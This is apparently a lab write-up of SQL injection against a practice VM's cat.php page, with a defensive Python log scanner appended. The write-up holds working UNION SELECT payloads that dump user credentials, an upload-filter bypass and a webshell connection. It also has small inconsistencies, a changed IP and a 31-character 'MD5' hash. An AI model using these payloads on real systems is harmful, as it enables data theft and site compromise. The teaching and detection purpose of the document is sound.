1. SQL injection
First, bring up the virtual machine and scan the current network segment from Kali; this turns up a suspicious IP address, 192.168.1.130.
Open the web page served by the virtual machine and probe it; there appears to be an SQL injection point:
http://192.168.1.130/cat.php?id=1
http://192.168.1.130/cat.php?id=1'
Use ORDER BY to work out the number of columns in the query behind the page. ORDER BY 5 makes the page return an error, so the query involves four columns.
Use a UNION query to find which positions are echoed on the page.
Position 2 is the echo position, and the database name is found to be photoblog.
http://192.168.1.130/cat.php?id=-2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='photoblog'
Following on, enumerate the tables in the database; the users table is the one of interest to us.
http://192.168.1.130/cat.php?id=-2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'
Next, query the column names in the users table: id, login and password.
View the data in the users table: id=1 login=admin password=8efe310f9ab3efae8d410a8e0166eb2
http://192.168.138.134/cat.php?id=-1 union select 1,group_concat(id,0x23,login,0x23,password),3,4 from users
Looking up the MD5 hash gives the password P4ssw0rd.
Log in to the admin page.
Try uploading a file; the upload is refused with "nophp".
After changing the file extension, the check is bypassed and the upload succeeds.
Get the upload path and connect to it with the Chopper webshell client (菜刀, the "kitchen knife").
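From the defender's side, the probing sequence above (the dangling quote, the ORDER BY column count, the UNION SELECT against information_schema) leaves a recognisable trail in the web server's access log. The following added example (not part of the original writeup) scans constructed Apache-style log lines for those phases and flags any id parameter that is not a plain integer, which is what a correctly validated cat.php would expect; the sample lines, IPs and timestamps are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined format (not from any real server);
# they replay the probing sequence from the writeup against cat.php.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Mar/2024:10:01:02 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 5123
192.168.1.50 - - [10/Mar/2024:10:01:09 +0000] "GET /cat.php?id=1%27 HTTP/1.1" 500 412
192.168.1.50 - - [10/Mar/2024:10:01:20 +0000] "GET /cat.php?id=1%20order%20by%205 HTTP/1.1" 500 412
192.168.1.50 - - [10/Mar/2024:10:02:01 +0000] "GET /cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27 HTTP/1.1" 200 6011
192.168.1.51 - - [10/Mar/2024:10:03:00 +0000] "GET /cat.php?id=2 HTTP/1.1" 200 5080
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Each signature corresponds to one phase of the UNION-based probing walk-through.
SIGNATURES = {
    "column_count_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\.", re.I),
}

def classify_value(value):
    """Return the signature names triggered by one percent-decoded parameter value."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    if value.count("'") % 2 == 1:  # the id=1' probe leaves a dangling quote
        hits.append("unbalanced_quote")
    return hits

def scan_log(text, numeric_params=("id",)):
    """Parse access-log lines and report requests whose parameters look like injection attempts."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qsl percent-decodes the values, so %27 and %20 become ' and space
        for param, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            hits = classify_value(value)
            if param in numeric_params and not re.fullmatch(r"-?\d+", value):
                hits.append("non_numeric_" + param)  # id should only ever be an integer
            if hits:
                findings.append({"ip": m["ip"], "status": m["status"], "param": param, "hits": sorted(hits)})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same integer check on id, applied in cat.php before the value reaches the query (or, better, a prepared statement), would have stopped every request the writeup relies on.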